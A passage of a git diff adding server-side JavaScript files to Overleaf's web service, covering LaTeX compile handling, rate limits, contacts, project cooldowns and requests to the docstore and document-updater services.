RequestFailedError) { + res.sendStatus(err.response.status) + } else { + res.sendStatus(500) + } + } + if ( + streamingStarted && + reqAborted && + err.code === 'ERR_STREAM_PREMATURE_CLOSE' + ) { + // Ignore noisy spurious error + return + } + if ( + err instanceof RequestFailedError && + ['sync-to-code', 'sync-to-pdf', 'output-file'].includes(action) + ) { + // Ignore noisy error + // https://github.com/overleaf/internal/issues/15201 + return + } + logger.warn( + { + err, + projectId, + url, + action, + reqAborted, + streamingStarted, + duration, + }, + 'CLSI proxy error' + ) + }) + } + ) + }, + + wordCount(req, res, next) { + const projectId = req.params.Project_id + const file = req.query.file || false + const { clsiserverid } = req.query + CompileController._compileAsUser(req, function (error, userId) { + if (error) { + return next(error) + } + CompileManager.wordCount( + projectId, + userId, + file, + clsiserverid, + function (error, body) { + if (error) { + return next(error) + } + res.json(body) + } + ) + }) + }, +} + +function _getPersistenceOptions( + req, + projectId, + compileGroup, + compileBackendClass, + callback +) { + const { clsiserverid } = req.query + const userId = SessionManager.getLoggedInUserId(req) + if (clsiserverid && typeof clsiserverid === 'string') { + callback(null, { + qs: { clsiserverid, compileGroup, compileBackendClass }, + headers: {}, + }) + } else { + ClsiCookieManager.getServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + (err, clsiServerId) => { + if (err) return callback(err) + callback(null, { + qs: { compileGroup, compileBackendClass }, + headers: clsiServerId + ? { + Cookie: new Cookie({ + key: Settings.clsiCookie.key, + value: clsiServerId, + }).cookieString(), + } + : {}, + }) + } + ) + } +} diff --git a/services/web/app/src/Features/Compile/CompileManager.js b/services/web/app/src/Features/Compile/CompileManager.js new file mode 100644 index 0000000..9b54048 --- /dev/null +++ b/services/web/app/src/Features/Compile/CompileManager.js @@ -0,0 +1,249 @@ +let CompileManager +const Crypto = require('crypto') +const Settings = require('@overleaf/settings') +const RedisWrapper = require('../../infrastructure/RedisWrapper') +const rclient = RedisWrapper.client('clsi_recently_compiled') +const ProjectGetter = require('../Project/ProjectGetter') +const ProjectRootDocManager = require('../Project/ProjectRootDocManager') +const UserGetter = require('../User/UserGetter') +const ClsiManager = require('./ClsiManager') +const Metrics = require('@overleaf/metrics') +const { RateLimiter } = require('../../infrastructure/RateLimiter') +const UserAnalyticsIdCache = require('../Analytics/UserAnalyticsIdCache') +const { + callbackify, + callbackifyMultiResult, +} = require('@overleaf/promise-utils') + +function instrumentWithTimer(fn, key) { + return async (...args) => { + const timer = new Metrics.Timer(key) + try { + return await fn(...args) + } finally { + timer.done() + } + } +} + +function generateBuildId() { + return `${Date.now().toString(16)}-${Crypto.randomBytes(8).toString('hex')}` +} + +async function compile(projectId, userId, options = {}) { + const recentlyCompiled = await CompileManager._checkIfRecentlyCompiled( + projectId, + userId + ) + if (recentlyCompiled) { + return { status: 'too-recently-compiled', outputFiles: [] } + } + + try { + const canCompile = await CompileManager._checkIfAutoCompileLimitHasBeenHit( + options.isAutoCompile, + 'everyone' + ) + if (!canCompile) { + return { status: 'autocompile-backoff', outputFiles: [] } + } + } catch (error) { + return { status: 'autocompile-backoff', outputFiles: [] } + } + + await ProjectRootDocManager.promises.ensureRootDocumentIsSet(projectId) + + const limits = + await CompileManager.promises.getProjectCompileLimits(projectId) + for (const key in limits) { + const value = limits[key] + options[key] = value + } + + try { + const canCompile = await CompileManager._checkCompileGroupAutoCompileLimit( + options.isAutoCompile, + limits.compileGroup + ) + if (!canCompile) { + return { status: 'autocompile-backoff', outputFiles: [] } + } + } catch (error) { + return { message: 'autocompile-backoff', outputFiles: [] } + } + + // Generate the buildId ahead of fetching the project content from redis/mongo so that the buildId's timestamp is before any lastUpdated date. + options.buildId = generateBuildId() + + // only pass userId down to clsi if this is a per-user compile + const compileAsUser = Settings.disablePerUserCompiles ? undefined : userId + const { + status, + outputFiles, + clsiServerId, + validationProblems, + stats, + timings, + outputUrlPrefix, + buildId, + } = await ClsiManager.promises.sendRequest(projectId, compileAsUser, options) + + return { + status, + outputFiles, + clsiServerId, + limits, + validationProblems, + stats, + timings, + outputUrlPrefix, + buildId, + } +} + +const instrumentedCompile = instrumentWithTimer(compile, 'editor.compile') + +async function getProjectCompileLimits(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + }) + + const owner = await UserGetter.promises.getUser(project.owner_ref, { + _id: 1, + alphaProgram: 1, + analyticsId: 1, + betaProgram: 1, + features: 1, + }) + + const ownerFeatures = (owner && owner.features) || {} + // put alpha users into their own compile group + if (owner && owner.alphaProgram) { + ownerFeatures.compileGroup = 'alpha' + } + const analyticsId = await UserAnalyticsIdCache.get(owner._id) + + const compileGroup = + ownerFeatures.compileGroup || Settings.defaultFeatures.compileGroup + const limits = { + timeout: + ownerFeatures.compileTimeout || Settings.defaultFeatures.compileTimeout, + compileGroup, + compileBackendClass: compileGroup === 'standard' ? 'n2d' : 'c2d', + ownerAnalyticsId: analyticsId, + } + return limits +} + +async function wordCount(projectId, userId, file, clsiserverid) { + const limits = + await CompileManager.promises.getProjectCompileLimits(projectId) + return await ClsiManager.promises.wordCount( + projectId, + userId, + file, + limits, + clsiserverid + ) +} + +async function stopCompile(projectId, userId) { + const limits = + await CompileManager.promises.getProjectCompileLimits(projectId) + + return await ClsiManager.promises.stopCompile(projectId, userId, limits) +} + +async function deleteAuxFiles(projectId, userId, clsiserverid) { + const limits = + await CompileManager.promises.getProjectCompileLimits(projectId) + + return await ClsiManager.promises.deleteAuxFiles( + projectId, + userId, + limits, + clsiserverid + ) +} + +module.exports = CompileManager = { + promises: { + compile: instrumentedCompile, + deleteAuxFiles, + getProjectCompileLimits, + stopCompile, + wordCount, + }, + compile: callbackifyMultiResult(instrumentedCompile, [ + 'status', + 'outputFiles', + 'clsiServerId', + 'limits', + 'validationProblems', + 'stats', + 'timings', + 'outputUrlPrefix', + 'buildId', + ]), + + stopCompile: callbackify(stopCompile), + + deleteAuxFiles: callbackify(deleteAuxFiles), + + getProjectCompileLimits: callbackify(getProjectCompileLimits), + + COMPILE_DELAY: 1, // seconds + async _checkIfRecentlyCompiled(projectId, userId) { + const key = `compile:${projectId}:${userId}` + const ok = await rclient.set(key, true, 'EX', this.COMPILE_DELAY, 'NX') + return ok !== 'OK' + }, + + async _checkCompileGroupAutoCompileLimit(isAutoCompile, compileGroup) { + if (!isAutoCompile) { + return true + } + if (compileGroup === 'standard') { + // apply extra limits to the standard compile group + return await CompileManager._checkIfAutoCompileLimitHasBeenHit( + isAutoCompile, + compileGroup + ) + } else { + Metrics.inc(`auto-compile-${compileGroup}`) + return true + } + }, // always allow priority group users to compile + + async _checkIfAutoCompileLimitHasBeenHit(isAutoCompile, compileGroup) { + if (!isAutoCompile) { + return true + } + Metrics.inc(`auto-compile-${compileGroup}`) + const rateLimiter = getAutoCompileRateLimiter(compileGroup) + try { + await rateLimiter.consume('global', 1, { method: 'global' }) + return true + } catch (e) { + // Don't differentiate between errors and rate limits. Silently trigger + // the rate limit if there's an error consuming the points. + Metrics.inc(`auto-compile-${compileGroup}-limited`) + return false + } + }, + + wordCount: callbackify(wordCount), +} + +const autoCompileRateLimiters = new Map() +function getAutoCompileRateLimiter(compileGroup) { + let rateLimiter = autoCompileRateLimiters.get(compileGroup) + if (rateLimiter == null) { + rateLimiter = new RateLimiter(`auto-compile:${compileGroup}`, { + points: Settings.rateLimit.autoCompile[compileGroup] || 25, + duration: 20, + }) + autoCompileRateLimiters.set(compileGroup, rateLimiter) + } + return rateLimiter +} diff --git a/services/web/app/src/Features/Contacts/ContactController.mjs b/services/web/app/src/Features/Contacts/ContactController.mjs new file mode 100644 index 0000000..12567d6 --- /dev/null +++ b/services/web/app/src/Features/Contacts/ContactController.mjs @@ -0,0 +1,60 @@ +import SessionManager from '../Authentication/SessionManager.js' +import ContactManager from './ContactManager.js' +import UserGetter from '../User/UserGetter.js' +import Modules from '../../infrastructure/Modules.js' +import { expressify } from '@overleaf/promise-utils' + +function _formatContact(contact) { + return { + id: contact._id?.toString(), + email: contact.email || '', + first_name: contact.first_name || '', + last_name: contact.last_name || '', + type: 'user', + } +} + +async function getContacts(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + + const contactIds = await ContactManager.promises.getContactIds(userId, { + limit: 50, + }) + + let contacts = await UserGetter.promises.getUsers(contactIds, { + email: 1, + first_name: 1, + last_name: 1, + holdingAccount: 1, + }) + + // UserGetter.getUsers may not preserve order so put them back in order + const positions = {} + for (let i = 0; i < contactIds.length; i++) { + const contactId = contactIds[i] + positions[contactId] = i + } + contacts.sort( + (a, b) => positions[a._id?.toString()] - positions[b._id?.toString()] + ) + + // Don't count holding accounts to discourage users from repeating mistakes (mistyped or wrong emails, etc) + contacts = contacts.filter(c => !c.holdingAccount) + + contacts = contacts.map(_formatContact) + + const additionalContacts = await Modules.promises.hooks.fire( + 'getContacts', + userId, + contacts + ) + + contacts = contacts.concat(...(additionalContacts || [])) + return res.json({ + contacts, + }) +} + +export default { + getContacts: expressify(getContacts), +} diff --git a/services/web/app/src/Features/Contacts/ContactManager.js b/services/web/app/src/Features/Contacts/ContactManager.js new file mode 100644 index 0000000..be5bdce --- /dev/null +++ b/services/web/app/src/Features/Contacts/ContactManager.js @@ -0,0 +1,51 @@ +const { callbackify } = require('util') +const OError = require('@overleaf/o-error') +const { fetchJson } = require('@overleaf/fetch-utils') +const settings = require('@overleaf/settings') + +async function getContactIds(userId, options) { + options = options ?? { limit: 50 } + + const url = new URL(`${settings.apis.contacts.url}/user/${userId}/contacts`) + + for (const [key, val] of Object.entries(options)) { + url.searchParams.set(key, val) + } + + let body + try { + body = await fetchJson(url) + } catch (err) { + throw OError.tag(err, 'failed request to contacts API', { userId }) + } + + return body?.contact_ids || [] +} + +async function addContact(userId, contactId) { + const url = new URL(`${settings.apis.contacts.url}/user/${userId}/contacts`) + + let body + try { + body = await fetchJson(url, { + method: 'POST', + json: { contact_id: contactId }, + }) + } catch (err) { + throw OError.tag(err, 'failed request to contacts API', { + userId, + contactId, + }) + } + + return body?.contact_ids || [] +} + +module.exports = { + getContactIds: callbackify(getContactIds), + addContact: callbackify(addContact), + promises: { + getContactIds, + addContact, + }, +} diff --git a/services/web/app/src/Features/Contacts/ContactRouter.mjs b/services/web/app/src/Features/Contacts/ContactRouter.mjs new file mode 100644 index 0000000..50db64f --- /dev/null +++ b/services/web/app/src/Features/Contacts/ContactRouter.mjs @@ -0,0 +1,28 @@ +import AuthenticationController from '../Authentication/AuthenticationController.js' +import SessionManager from '../Authentication/SessionManager.js' +import ContactController from './ContactController.mjs' +import Settings from '@overleaf/settings' + +function contactsAuthenticationMiddleware() { + if (!Settings.allowAnonymousReadAndWriteSharing) { + return AuthenticationController.requireLogin() + } else { + return (req, res, next) => { + if (SessionManager.isUserLoggedIn(req.session)) { + next() + } else { + res.json({ contacts: [] }) + } + } + } +} + +export default { + apply(webRouter) { + webRouter.get( + '/user/contacts', + contactsAuthenticationMiddleware(), + ContactController.getContacts + ) + }, +} diff --git a/services/web/app/src/Features/Cooldown/CooldownManager.js b/services/web/app/src/Features/Cooldown/CooldownManager.js new file mode 100644 index 0000000..67bdc98 --- /dev/null +++ b/services/web/app/src/Features/Cooldown/CooldownManager.js @@ -0,0 +1,61 @@ +/* eslint-disable + n/handle-callback-err, + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let CooldownManager +const RedisWrapper = require('../../infrastructure/RedisWrapper') +const rclient = RedisWrapper.client('cooldown') +const logger = require('@overleaf/logger') +const { promisifyAll } = require('@overleaf/promise-utils') + +const COOLDOWN_IN_SECONDS = 60 * 10 + +module.exports = CooldownManager = { + _buildKey(projectId) { + return `Cooldown:{${projectId}}` + }, + + putProjectOnCooldown(projectId, callback) { + if (callback == null) { + callback = function () {} + } + logger.debug( + { projectId }, + `[Cooldown] putting project on cooldown for ${COOLDOWN_IN_SECONDS} seconds` + ) + return rclient.set( + CooldownManager._buildKey(projectId), + '1', + 'EX', + COOLDOWN_IN_SECONDS, + callback + ) + }, + + isProjectOnCooldown(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return rclient.get( + CooldownManager._buildKey(projectId), + function (err, result) { + if (err != null) { + return callback(err) + } + return callback(null, result === '1') + } + ) + }, +} + +module.exports.promises = promisifyAll(module.exports, { + without: ['_buildKey'], +}) diff --git a/services/web/app/src/Features/Cooldown/CooldownMiddleware.mjs b/services/web/app/src/Features/Cooldown/CooldownMiddleware.mjs new file mode 100644 index 0000000..46a84eb --- /dev/null +++ b/services/web/app/src/Features/Cooldown/CooldownMiddleware.mjs @@ -0,0 +1,41 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import CooldownManager from './CooldownManager.js' +import logger from '@overleaf/logger' + +let CooldownMiddleware + +export default CooldownMiddleware = { + freezeProject(req, res, next) { + const projectId = req.params.Project_id + if (projectId == null) { + return next(new Error('[Cooldown] No projectId parameter on route')) + } + return CooldownManager.isProjectOnCooldown( + projectId, + function (err, projectIsOnCooldown) { + if (err != null) { + return next(err) + } + if (projectIsOnCooldown) { + logger.debug( + { projectId }, + '[Cooldown] project is on cooldown, denying request' + ) + return res.sendStatus(429) + } + return next() + } + ) + }, +} diff --git a/services/web/app/src/Features/Docstore/DocstoreManager.js b/services/web/app/src/Features/Docstore/DocstoreManager.js new file mode 100644 index 0000000..5fe0f27 --- /dev/null +++ b/services/web/app/src/Features/Docstore/DocstoreManager.js @@ -0,0 +1,314 @@ +const { promisify } = require('util') +const { promisifyMultiResult } = require('@overleaf/promise-utils') +const request = require('request').defaults({ jar: false }) +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const Errors = require('../Errors/Errors') + +const TIMEOUT = 30 * 1000 // request timeout + +function deleteDoc(projectId, docId, name, deletedAt, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}` + const docMetaData = { deleted: true, deletedAt, name } + const options = { url, json: docMetaData, timeout: TIMEOUT } + request.patch(options, (error, res) => { + if (error) { + return callback(error) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + callback(null) + } else if (res.statusCode === 404) { + error = new Errors.NotFoundError({ + message: 'tried to delete doc not in docstore', + info: { + projectId, + docId, + }, + }) + callback(error) // maybe suppress the error when delete doc which is not present? + } else { + error = new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { + projectId, + docId, + } + ) + callback(error) + } + }) +} + +/** + * @param {string} projectId + */ +function getAllDocs(projectId, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/doc` + request.get( + { + url, + timeout: TIMEOUT, + json: true, + }, + (error, res, docs) => { + if (error) { + return callback(error) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + callback(null, docs) + } else { + error = new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { projectId } + ) + callback(error) + } + } + ) +} + +function getAllDeletedDocs(projectId, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/doc-deleted` + request.get({ url, timeout: TIMEOUT, json: true }, (error, res, docs) => { + if (error) { + callback(OError.tag(error, 'could not get deleted docs from docstore')) + } else if (res.statusCode === 200) { + callback(null, docs) + } else { + callback( + new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { projectId } + ) + ) + } + }) +} + +/** + * @param {string} projectId + * @param {Callback} callback + */ +function getAllRanges(projectId, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/ranges` + request.get( + { + url, + timeout: TIMEOUT, + json: true, + }, + (error, res, docs) => { + if (error) { + return callback(error) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + callback(null, docs) + } else { + error = new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { projectId } + ) + callback(error) + } + } + ) +} + +function getDoc(projectId, docId, options, callback) { + if (options == null) { + options = {} + } + if (typeof options === 'function') { + callback = options + options = {} + } + const requestParams = { timeout: TIMEOUT, json: true } + if (options.peek) { + requestParams.url = `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}/peek` + } else { + requestParams.url = `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}` + } + if (options.include_deleted) { + requestParams.qs = { include_deleted: 'true' } + } + request.get(requestParams, (error, res, doc) => { + if (error) { + return callback(error) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + logger.debug( + { docId, projectId, version: doc.version, rev: doc.rev }, + 'got doc from docstore api' + ) + callback(null, doc.lines, doc.rev, doc.version, doc.ranges) + } else if (res.statusCode === 404) { + error = new Errors.NotFoundError({ + message: 'doc not found in docstore', + info: { + projectId, + docId, + }, + }) + callback(error) + } else { + error = new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { + projectId, + docId, + } + ) + callback(error) + } + }) +} + +function isDocDeleted(projectId, docId, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}/deleted` + request.get({ url, timeout: TIMEOUT, json: true }, (err, res, body) => { + if (err) { + callback(err) + } else if (res.statusCode === 200) { + callback(null, body.deleted) + } else if (res.statusCode === 404) { + callback( + new Errors.NotFoundError({ + message: 'doc does not exist in project', + info: { projectId, docId }, + }) + ) + } else { + callback( + new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { projectId, docId } + ) + ) + } + }) +} + +function updateDoc(projectId, docId, lines, version, ranges, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/doc/${docId}` + request.post( + { + url, + timeout: TIMEOUT, + json: { + lines, + version, + ranges, + }, + }, + (error, res, result) => { + if (error) { + return callback(error) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + logger.debug( + { projectId, docId }, + 'update doc in docstore url finished' + ) + callback(null, result.modified, result.rev) + } else { + error = new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { projectId, docId } + ) + callback(error) + } + } + ) +} + +/** + * Asks docstore whether any doc in the project has ranges + * + * @param {string} proejctId + * @param {Callback} callback + */ +function projectHasRanges(projectId, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/has-ranges` + request.get({ url, timeout: TIMEOUT, json: true }, (err, res, body) => { + if (err) { + return callback(err) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + callback(null, body.projectHasRanges) + } else { + callback( + new OError( + `docstore api responded with non-success code: ${res.statusCode}`, + { projectId } + ) + ) + } + }) +} + +function archiveProject(projectId, callback) { + _operateOnProject(projectId, 'archive', callback) +} + +function unarchiveProject(projectId, callback) { + _operateOnProject(projectId, 'unarchive', callback) +} + +function destroyProject(projectId, callback) { + _operateOnProject(projectId, 'destroy', callback) +} + +function _operateOnProject(projectId, method, callback) { + const url = `${settings.apis.docstore.url}/project/${projectId}/${method}` + logger.debug({ projectId }, `calling ${method} for project in docstore`) + // use default timeout for archiving/unarchiving/destroying + request.post(url, (err, res, docs) => { + if (err) { + OError.tag(err, `error calling ${method} project in docstore`, { + projectId, + }) + return callback(err) + } + + if (res.statusCode >= 200 && res.statusCode < 300) { + callback() + } else { + const error = new Error( + `docstore api responded with non-success code: ${res.statusCode}` + ) + logger.warn( + { err: error, projectId }, + `error calling ${method} project in docstore` + ) + callback(error) + } + }) +} + +module.exports = { + deleteDoc, + getAllDocs, + getAllDeletedDocs, + getAllRanges, + getDoc, + isDocDeleted, + updateDoc, + projectHasRanges, + archiveProject, + unarchiveProject, + destroyProject, + promises: { + deleteDoc: promisify(deleteDoc), + getAllDocs: promisify(getAllDocs), + getAllDeletedDocs: promisify(getAllDeletedDocs), + getAllRanges: promisify(getAllRanges), + getDoc: promisifyMultiResult(getDoc, ['lines', 'rev', 'version', 'ranges']), + isDocDeleted: promisify(isDocDeleted), + updateDoc: promisifyMultiResult(updateDoc, ['modified', 'rev']), + projectHasRanges: promisify(projectHasRanges), + archiveProject: promisify(archiveProject), + unarchiveProject: promisify(unarchiveProject), + destroyProject: promisify(destroyProject), + }, +} diff --git a/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterController.mjs b/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterController.mjs new file mode 100644 index 0000000..d02b5a7 --- /dev/null +++ b/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterController.mjs @@ -0,0 +1,47 @@ +import logger from '@overleaf/logger' +import DocumentUpdaterHandler from './DocumentUpdaterHandler.js' +import ProjectLocator from '../Project/ProjectLocator.js' +import { plainTextResponse } from '../../infrastructure/Response.js' +import { expressify } from '@overleaf/promise-utils' + +async function getDoc(req, res) { + const projectId = req.params.Project_id + const docId = req.params.Doc_id + + try { + const { element: doc } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: docId, + type: 'doc', + }) + + const { lines } = await DocumentUpdaterHandler.promises.getDocument( + projectId, + docId, + -1 // latest version only + ) + + res.setContentDisposition('attachment', { filename: doc.name }) + plainTextResponse(res, lines.join('\n')) + } catch (err) { + if (err.name === 'NotFoundError') { + logger.warn( + { err, projectId, docId }, + 'entity not found when downloading doc' + ) + + return res.sendStatus(404) + } + + logger.err( + { err, projectId, docId }, + 'error getting document for downloading' + ) + + return res.sendStatus(500) + } +} + +export default { + getDoc: expressify(getDoc), +} diff --git a/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterHandler.js b/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterHandler.js new file mode 100644 index 0000000..493b812 --- /dev/null +++ b/services/web/app/src/Features/DocumentUpdater/DocumentUpdaterHandler.js @@ -0,0 +1,656 @@ +const request = require('request').defaults({ timeout: 30 * 1000 }) +const OError = require('@overleaf/o-error') +const settings = require('@overleaf/settings') +const _ = require('lodash') +const async = require('async') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const { promisify } = require('util') +const { promisifyMultiResult } = require('@overleaf/promise-utils') +const ProjectGetter = require('../Project/ProjectGetter') +const FileStoreHandler = require('../FileStore/FileStoreHandler') +const Features = require('../../infrastructure/Features') + +function getProjectLastUpdatedAt(projectId, callback) { + _makeRequest( + { + path: `/project/${projectId}/last_updated_at`, + method: 'GET', + json: true, + }, + projectId, + 'project.redis.last_updated_at', + (err, body) => { + if (err || !body?.lastUpdatedAt) return callback(err, null) + callback(null, new Date(body.lastUpdatedAt)) + } + ) +} + +/** + * @param {string} projectId + */ +function flushProjectToMongo(projectId, callback) { + _makeRequest( + { + path: `/project/${projectId}/flush`, + method: 'POST', + }, + projectId, + 'flushing.mongo.project', + callback + ) +} + +function flushMultipleProjectsToMongo(projectIds, callback) { + const jobs = projectIds.map(projectId => callback => { + flushProjectToMongo(projectId, callback) + }) + async.series(jobs, callback) +} + +/** + * @param {string} projectId + */ +function flushProjectToMongoAndDelete(projectId, callback) { + _makeRequest( + { + path: `/project/${projectId}`, + method: 'DELETE', + }, + projectId, + 'flushing.mongo.project', + callback + ) +} + +function flushDocToMongo(projectId, docId, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/flush`, + method: 'POST', + }, + projectId, + 'flushing.mongo.doc', + callback + ) +} + +function deleteDoc(projectId, docId, ignoreFlushErrors, callback) { + if (typeof ignoreFlushErrors === 'function') { + callback = ignoreFlushErrors + ignoreFlushErrors = false + } + let path = `/project/${projectId}/doc/${docId}` + if (ignoreFlushErrors) { + path += '?ignore_flush_errors=true' + } + const method = 'DELETE' + _makeRequest( + { + path, + method, + }, + projectId, + 'delete.mongo.doc', + callback + ) +} + +function getComment(projectId, docId, commentId, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/comment/${commentId}`, + json: true, + }, + projectId, + 'get-comment', + function (error, comment) { + if (error) { + return callback(error) + } + callback(null, comment) + } + ) +} + +function getDocument(projectId, docId, fromVersion, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}?fromVersion=${fromVersion}`, + json: true, + }, + projectId, + 'get-document', + function (error, doc) { + if (error) { + return callback(error) + } + callback(null, doc.lines, doc.version, doc.ranges, doc.ops) + } + ) +} + +function setDocument(projectId, docId, userId, docLines, source, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}`, + method: 'POST', + json: { + lines: docLines, + source, + user_id: userId, + }, + }, + projectId, + 'set-document', + callback + ) +} + +function appendToDocument(projectId, docId, userId, lines, source, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/append`, + method: 'POST', + json: { + lines, + source, + user_id: userId, + }, + }, + projectId, + 'append-to-document', + callback + ) +} + +function getProjectDocsIfMatch(projectId, projectStateHash, callback) { + // If the project state hasn't changed, we can get all the latest + // docs from redis via the docupdater. Otherwise we will need to + // fall back to getting them from mongo. + const timer = new metrics.Timer('get-project-docs') + const url = `${settings.apis.documentupdater.url}/project/${projectId}/get_and_flush_if_old?state=${projectStateHash}` + request.post(url, function (error, res, body) { + timer.done() + if (error) { + OError.tag(error, 'error getting project docs from doc updater', { + url, + projectId, + }) + return callback(error) + } + if (res.statusCode === 409) { + // HTTP response code "409 Conflict" + // Docupdater has checked the projectStateHash and found that + // it has changed. This means that the docs currently in redis + // aren't the only change to the project and the full set of + // docs/files should be retreived from docstore/filestore + // instead. + callback() + } else if (res.statusCode >= 200 && res.statusCode < 300) { + let docs + try { + docs = JSON.parse(body) + } catch (error1) { + return callback(OError.tag(error1)) + } + callback(null, docs) + } else { + callback( + new OError( + `doc updater returned a non-success status code: ${res.statusCode}`, + { + projectId, + url, + } + ) + ) + } + }) +} + +function clearProjectState(projectId, callback) { + _makeRequest( + { + path: `/project/${projectId}/clearState`, + method: 'POST', + }, + projectId, + 'clear-project-state', + callback + ) +} + +function acceptChanges(projectId, docId, changeIds, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/change/accept`, + json: { change_ids: changeIds }, + method: 'POST', + }, + projectId, + 'accept-changes', + callback + ) +} + +function resolveThread(projectId, docId, threadId, userId, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/comment/${threadId}/resolve`, + method: 'POST', + json: { + user_id: userId, + }, + }, + projectId, + 'resolve-thread', + callback + ) +} + +function reopenThread(projectId, docId, threadId, userId, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/comment/${threadId}/reopen`, + method: 'POST', + json: { + user_id: userId, + }, + }, + projectId, + 'reopen-thread', + callback + ) +} + +function deleteThread(projectId, docId, threadId, userId, callback) { + _makeRequest( + { + path: `/project/${projectId}/doc/${docId}/comment/${threadId}`, + method: 'DELETE', + json: { + user_id: userId, + }, + }, + projectId, + 'delete-thread', + callback + ) +} + +function resyncProjectHistory( + projectId, + projectHistoryId, + docs, + files, + opts, + callback +) { + docs = docs.map(doc => ({ + doc: doc.doc._id, + path: doc.path, + })) + const hasFilestore = Features.hasFeature('filestore') + if (!hasFilestore) { + // Files without a hash likely do not have a blob. Abort. + for (const { file } of files) { + if (!file.hash) { + return callback( + new OError('found file with missing hash', { projectId, file }) + ) + } + } + } + files = files.map(file => ({ + file: file.file._id, + path: file.path, + url: hasFilestore + ? FileStoreHandler._buildUrl(projectId, file.file._id) + : undefined, + _hash: file.file.hash, + createdBlob: !hasFilestore, + metadata: buildFileMetadataForHistory(file.file), + })) + + const body = { docs, files, projectHistoryId } + if (opts.historyRangesMigration) { + body.historyRangesMigration = opts.historyRangesMigration + } + if (opts.resyncProjectStructureOnly) { + body.resyncProjectStructureOnly = opts.resyncProjectStructureOnly + } + _makeRequest( + { + path: `/project/${projectId}/history/resync`, + json: body, + method: 'POST', + timeout: 6 * 60 * 1000, // allow 6 minutes for resync + }, + projectId, + 'resync-project-history', + callback + ) +} + +/** + * Block a project from being loaded in docupdater + * + * @param {string} projectId + * @param {Callback} callback + */ +function blockProject(projectId, callback) { + _makeRequest( + { path: `/project/${projectId}/block`, method: 'POST', json: true }, + projectId, + 'block-project', + (err, body) => { + if (err) { + return callback(err) + } + callback(null, body.blocked) + } + ) +} + +/** + * Unblock a previously blocked project + * + * @param {string} projectId + * @param {Callback} callback + */ +function unblockProject(projectId, callback) { + _makeRequest( + { path: `/project/${projectId}/unblock`, method: 'POST', json: true }, + projectId, + 'unblock-project', + (err, body) => { + if (err) { + return callback(err) + } + callback(null, body.wasBlocked) + } + ) +} + +function updateProjectStructure( + projectId, + projectHistoryId, + userId, + changes, + source, + callback +) { + if ( + settings.apis.project_history == null || + !settings.apis.project_history.sendProjectStructureOps + ) { + return callback() + } + + ProjectGetter.getProjectWithoutLock( + projectId, + { overleaf: true }, + (err, project) => { + if (err) { + return callback(err) + } + const historyRangesSupport = _.get( + project, + 'overleaf.history.rangesSupportEnabled', + false + ) + const { + deletes: docDeletes, + adds: docAdds, + renames: docRenames, + } = _getUpdates( + 'doc', + changes.oldDocs, + changes.newDocs, + historyRangesSupport + ) + const hasFilestore = Features.hasFeature('filestore') + if (!hasFilestore) { + for (const newEntity of changes.newFiles || []) { + if (!newEntity.file.hash) { + // Files without a hash likely do not have a blob. Abort. + return callback( + new OError('found file with missing hash', { newEntity }) + ) + } + } + } + const { + deletes: fileDeletes, + adds: fileAdds, + renames: fileRenames, + } = _getUpdates( + 'file', + changes.oldFiles, + changes.newFiles, + historyRangesSupport + ) + const updates = [].concat( + docDeletes, + fileDeletes, + docAdds, + fileAdds, + docRenames, + fileRenames + ) + const projectVersion = + changes && changes.newProject && changes.newProject.version + + if (updates.length < 1) { + return callback() + } + + if (projectVersion == null) { + logger.warn( + { projectId, changes, projectVersion }, + 'did not receive project version in changes' + ) + return callback(new Error('did not receive project version in changes')) + } + + _makeRequest( + { + path: `/project/${projectId}`, + json: { 